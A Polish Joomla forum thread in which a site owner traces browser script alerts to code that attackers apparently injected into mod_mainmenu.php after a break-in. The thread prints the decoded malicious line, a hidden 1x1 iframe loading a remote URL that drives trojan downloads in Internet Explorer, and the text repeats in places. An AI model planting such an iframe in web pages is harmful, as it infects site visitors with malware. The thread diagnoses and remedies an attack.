Dziwny blad w joomli? - Joomla! Forum - community, help and support
witam, wiec mam problem, jesil wchodze na swoja www przez ie wyskakuje mi takie okno:
dodatkowo uruchamia mi sie antywirus.
dodam ze kilka tygodni temu wlamala mi sie na serwr grupa tureckich hakerow, wykorzystala dziure w simpleboard.
gdy odpali sie okienko monit skyrptu bardzo czesto zawiesza sie ie, wyskakuje kazdemu :/ jednak na firefoxie jest ok.
oto adres: http://www.mogilnobikerz.com
prosze o pomoc, jest dla mnie bardzo wazne!
pozdrawiam
dodatkowo uruchamia mi sie antywirus.
dodam ze kilka tygodni temu wlamala mi sie na serwr grupa tureckich hakerow, wykorzystala dziure w simpleboard.
gdy odpali sie okienko monit skyrptu bardzo czesto zawiesza sie ie, wyskakuje kazdemu :/ jednak na firefoxie jest ok.
oto adres: http://www.mogilnobikerz.com
prosze o pomoc, jest dla mnie bardzo wazne!
pozdrawiam
rozwiazanie problemu
ok godzina analizowania plików znalazlem... byla luka w cms'ie... otóz winowajca byl kod prawdopodobnie dodany podczas ataku tureckich hakerow pliku: mod_mainmenu.php. na pocatku tego pliku mozna bylo znalezc linijke:
czyli ladnie zakodowane za pomoca ascii... po rozkodowaniu otrzymujemy:
http://zchxsikpgz.biz/dl/adv521.php
czyli rozkodowana linijka wyglada tak:
czyli wchodzimy przez dziurawego ie sciaga sie automatycznie plik http://zchxsikpgz.biz/dl/adv521.php na dysk instaluja sie trojany!
w firefoxie widać tylko kwadraty przy modułach menu o wielkości 1px x 1px z obramowaniem.
ok godzina analizowania plików znalazlem... byla luka w cms'ie... otóz winowajca byl kod prawdopodobnie dodany podczas ataku tureckich hakerow pliku: mod_mainmenu.php. na pocatku tego pliku mozna bylo znalezc linijke:
code: select all
echo '<iframe src="http://zchxsikpgz.biz/dl/adv521.php" width=1 height=1></iframe>';
czyli ladnie zakodowane za pomoca ascii... po rozkodowaniu otrzymujemy:
http://zchxsikpgz.biz/dl/adv521.php
czyli rozkodowana linijka wyglada tak:
code: select all
echo '<iframe src="http://zchxsikpgz.biz/dl/adv521.php" width=1 height=1></iframe>';
czyli wchodzimy przez dziurawego ie sciaga sie automatycznie plik http://zchxsikpgz.biz/dl/adv521.php na dysk instaluja sie trojany!
w firefoxie widać tylko kwadraty przy modułach menu o wielkości 1px x 1px z obramowaniem.
Comments
Post a Comment